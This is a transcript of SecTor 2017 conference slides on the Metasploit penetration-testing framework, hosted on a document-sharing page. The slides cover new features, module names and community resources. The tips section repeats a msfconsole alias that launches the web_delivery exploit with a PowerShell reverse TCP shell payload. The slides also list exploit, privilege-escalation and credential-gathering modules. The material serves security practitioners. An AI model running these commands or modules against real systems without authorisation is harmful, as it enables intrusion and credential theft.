metasploit community - sector 2017 · pdf filethe agenda intro to metasploit what’s new...

Report

Post on 16-Mar-2018

226 Views

Category:

Documents

4 Downloads

Preview:

Click to see full reader

TRANSCRIPT

Metasploit Community:Tips, Tricks and What’s New

At SecTor 2017

Who am I?

Github: jmartin-r7Twitter: @Op3n4M3

Jeffrey Martin

Senior Software Developer @ Rapid7

The Metasploit Community

The Agenda

● Intro to Metasploit● What’s New in Metasploit● Quick tips and hints● What’s on the Horizon● Question?

The Basicsmsfvenom

Meterpreter/ShellBind/Reverse

MsfconsoleModules

Exploit/Post/AuxHandler

Innovating with Metasploit

Modulesmulti/http/struts2_rest_xstream

multi/http/struts2_content_type_ognlexploits/linux/samba/is_known_pipename

exploits/windows/smb/ms17_010_eternalbluepost/windows/gather/credentials/dynazip_log

Named Pipes

Railgun

Packet Encryption

AggregatorAlice’s Console

Bob’s Console

Shells

External Module

Console

JSON RPC

Proxy

SOCKS 5

MSF-RPC

Session

ProjectCold Stone

vm-automationmetasploit-baseline-builder

metasploitable3

You use it, have you done this?

Getting up there quickly:alias powershell='msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/powershell_reverse_tcp; set LHOST eth0; exploit"

When it works:post/windows/gather/enum_patchespost/multi/recon/local_exploit_suggester

You use it, have you done this?

Getting up there quickly:alias powershell='msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/powershell_reverse_tcp; set LHOST eth0; exploit"

When it works:post/windows/gather/enum_patchespost/multi/recon/local_exploit_suggester

You use it, have you done this?

When it doesn’t quite do it:msf> edit

You use it, have you done this?

When you want more: exploits/windows/local/ms16_032_secondary_logon_handle_privesc exploits/windows/local/bypassuac_fodhelper.rb exploits/windows/local/capcom_sys_exec.rb exploits/windows/local/razer_zwopenprocess.rb

ProjectGoliath

Database

Database

MetasploitConsole

NMap, EyeWitness, etc

RubySMB (SMB 1+2)

Questions?

● IRCServer - irc.freenode.netChannel - #metasploit

● Blogblog.rapid7.com/tag/metasploit

● Emailmsfdev@metasploit.com

● Youtubehttps://www.youtube.com/c/MetasploitR7

● New Metasploit.com● COMING SOON

Slack

https://www.youtube.com/c/MetasploitR7

top related

cpods training-metasploit
Documents
userguide metasploit pro
Documents
louisville infosec - metasploit class - fuzzing and exploit...
Technology
pentest with metasploit
Technology
metasploit completo
Documents
metasploit express user guide -...
Documents
mastering metasploit
Software
metasploit module development
Documents
metasploit 1.pdf
Documents
metasploit 2.pdf
Documents
metasploit (module-1) - getting started with metasploit
Presentations & Public Speaking
metasploit& hacking Ético rootedlab€¦ · metasploit&...
Documents
attacking oracle web applications with metasploit oracle web...
Documents
abusing windows remote management with metasploit david...
Documents
metasploit for beginners
Technology
metasploit open tutorial
Documents
metasploit demo
Education
the network security test lab - startseite...metasploit 286...
Documents
mass pwnage metasploit
Documents
guida metasploit framework
Documents